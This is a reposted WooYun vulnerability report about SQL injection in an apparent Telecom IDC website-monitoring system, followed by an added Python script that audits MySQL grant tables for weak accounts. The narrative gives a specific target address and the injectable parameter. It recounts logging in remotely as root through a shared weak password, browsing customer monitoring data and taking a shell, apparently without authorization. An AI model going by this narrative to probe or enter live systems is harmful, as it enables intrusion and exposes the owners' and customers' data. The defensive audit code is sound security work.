Reposted from wooyun
Found rather by accident; the intrusion was rather startling.
1. An SQL injection vulnerability I stumbled upon in a rather odd Telecom system (apparently used to monitor access to customer websites). This situation may be common across Telecom IDCs. Test address: http://118.123.206.9/preuid.php?uid=2610023800
Web Server: Apache/2.2.23 (Unix) PHP/5.4.7
Powered-by: PHP/5.4.7
DB Server: MySQL >=5
Current User: root@localhost
Sql Version: 5.5.28-log
Current DB: analytics
System User: root@localhost
Host Name: localhost.localdomain
Installation dir: /usr
DB User & Pass: (credential rows omitted)
Data Bases: information_schema, IDC, analytics, mysql, netflow, performance_schema, rec_web, report, report1, test, web, web_test, zj
Nothing worth looking at on the front end.
2. The database privilege is still root. Okay, looks like the database allows the web and remote users to connect from outside, and they all share the same weak password, ok, so let's telnet in and see whether it's on the default port.
bingo, still root privilege.
3. Let's see whether there's anything good in there. Looks like it monitored quite a few websites.
4. Well, since it's come to this, I'd be letting myself down if I didn't grab a shell (privilege escalation is pointless at this point).
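The grant-table weaknesses the post relies on (root and service accounts reachable from any host, an anonymous account, empty passwords, and one password hash reused by several accounts) are exactly what a DBA audit should catch. The following is an added example, not code from the original post; it parses a dump in the same `user:hash:host` shape the post's tool printed, using constructed placeholder rows rather than the real credentials.

```python
from collections import defaultdict

# Constructed sample dump in the 'user:hash:host' shape the post's tool
# printed; every hash here is a placeholder, not a real credential.
SAMPLE_DUMP = """\
root:*PLACEHOLDER_HASH_A:localhost
root::localhost.localdomain
::localhost
remote:*PLACEHOLDER_HASH_B:%
root:*PLACEHOLDER_HASH_A:%
hpflow:*PLACEHOLDER_HASH_A:198.51.100.9
web:*PLACEHOLDER_HASH_B:%
"""

LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1", "localhost.localdomain"}

def parse_dump(text):
    """Turn 'user:hash:host' lines into (user, host, auth) tuples; split(':', 2) keeps a ':' inside the host (e.g. '::1')."""
    rows = []
    for line in text.strip().splitlines():
        user, auth, host = line.strip().split(":", 2)
        rows.append((user, host, auth))
    return rows

def audit_mysql_users(rows):
    """Flag the grant-table weaknesses the post found, grouped by type."""
    findings = {"wildcard_host": [], "no_password": [], "anonymous": [],
                "remote_root": [], "shared_hash": []}
    users_by_hash = defaultdict(set)
    for user, host, auth in rows:
        acct = f"{user or '<anonymous>'}@{host}"
        if host == "%":                      # reachable from any address
            findings["wildcard_host"].append(acct)
        if not auth:                         # empty authentication string
            findings["no_password"].append(acct)
        if not user:                         # MySQL anonymous account
            findings["anonymous"].append(acct)
        if user == "root" and host not in LOCAL_HOSTS:
            findings["remote_root"].append(acct)
        if auth:
            users_by_hash[auth].add(user)
    # One hash under several account names means a single password guards
    # several logins, which is what let the post pivot from web to root.
    for users in users_by_hash.values():
        if len(users) > 1:
            findings["shared_hash"].append(sorted(users))
    return findings
```

Run `audit_mysql_users(parse_dump(SAMPLE_DUMP))` against a real `SELECT user, authentication_string, host FROM mysql.user` export formatted the same way; any non-empty list is a finding to fix before the server is exposed.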